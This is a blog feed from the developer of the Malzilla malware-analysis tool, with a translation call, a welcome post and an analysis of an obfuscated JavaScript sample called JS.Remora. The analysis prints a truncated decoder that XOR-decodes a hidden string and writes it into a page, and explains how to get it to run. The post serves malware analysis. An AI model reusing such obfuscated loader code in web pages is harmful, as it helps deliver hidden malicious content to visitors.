tag:blogger.com,1999:blog-34996207096026481542024-03-08T12:48:35.762-08:00Malzilla's exploit watchbobbyhttp://www.blogger.com/profile/02585997828166542788noreply@blogger.comBlogger3125tag:blogger.com,1999:blog-3499620709602648154.post-90002730478247753792008-01-20T12:07:00.000-08:002008-01-20T12:12:41.424-08:00Preparing the new releaseAnyone willing to translate Malzilla to other languages?<br /><br />I'm preparing the next release, and I would like to include a couple of translations with the release.<br /><br />There is some 200 strings to translate. Unicode is supported, so one can even translate to Chinese or Arabic.<br />Translation tool is also available.<br /><br />I'm still polishing the interface, so the string list is still not complete, but if anyone applies for translating, I would prepare the list in ~10 days.<br /><br />Also, if you like to test the current development snapshot and to participate into interface/options design decisions - please send me a email (s p a s i c @ g m a i l . c o m)bobbyhttp://www.blogger.com/profile/02585997828166542788noreply@blogger.com1tag:blogger.com,1999:blog-3499620709602648154.post-74245441930246496762007-11-19T11:33:00.000-08:002007-11-19T13:28:22.442-08:00JS.RemoraA interesting one (underscores are here just for the sake of text-formating).<br /><blockquote><span style="font-size:85%;">if(lIz!=1)<br />{<br />_function iR(Sf)<br />__{<br />___return Sf<br />__}<br />_try<br />_{<br />__var mR='ee2el2eM2eD2eX2eJ2eL2en2ek2eS2eT2em2e ... ';<br />__var fS=mR.substr(2,1),<br />__oC=Array(19630^19513,27309^27253,RQ('217'),RQ('194') ... ));<br />__var ab, Ar;<br />__var To,<br />__LY='eeeleMeDeXeJeLenekeSeTemeReMeLeXeAeReWeqebeDeteOe ... ';<br />__var cG=String();<br />__function RQ(ev)<br />__{<br />___return parseInt(ev)<br />__}<br />__mR=mR.split(fS);<br />__for (ab=0;ab<LY.length;ab+=2)<br />__{<br />___To=LY.substr(ab,2);<br />___var VOh=mR.length;<br />___for(Ar=0;Ar<VOh;Ar++)<br />___{<br />____if(1==0);<br />____if(mR[Ar]==To) break;<br />___}<br />___cG+=String.fromCharCode(oC[Ar]^171);<br />__}<br />__document.write(cG);<br />_}<br />_catch(xlW){}<br />}<br />var lIz=1</span></blockquote>If I run it in Malzilla, Malzilla will say that the script compiled, but there is no output at all.<br />So, only conclusion would be that the script throws an error, but the error get caught because try..catch block.<br /><br />So, where is the error?<br />Lets change the catch statement a little bit:<br /><br /><span style="font-weight: bold;">_catch(xlW){document.write(xlW.name + ': '+ xlW.message)}</span><br /><br />Running the script again will produce now something useful for us:<br /><br /><span style="font-weight: bold;">ReferenceError: RQ is not defined</span><br /><br />Now take a look again at the script - the function RQ is there, so whats wrong?<br />It is in wrong place, at least for SpiderMonkey.<br />Cut the RQ function and move it to the top of the script, run the script again and voila - the script will run and produce the output.bobbyhttp://www.blogger.com/profile/02585997828166542788noreply@blogger.com0tag:blogger.com,1999:blog-3499620709602648154.post-75765794323644342832007-11-16T23:46:00.000-08:002007-11-16T23:51:50.748-08:00Somewhere to startA 'Hi' from the developer of <a href="http://malzilla.sourceforge.net/">Malzilla</a><br />I'll keep you here informed about the development, and about the interesting cases of Malzilla's usage.<br /><br />regards<br />bobbybobbyhttp://www.blogger.com/profile/02585997828166542788noreply@blogger.com0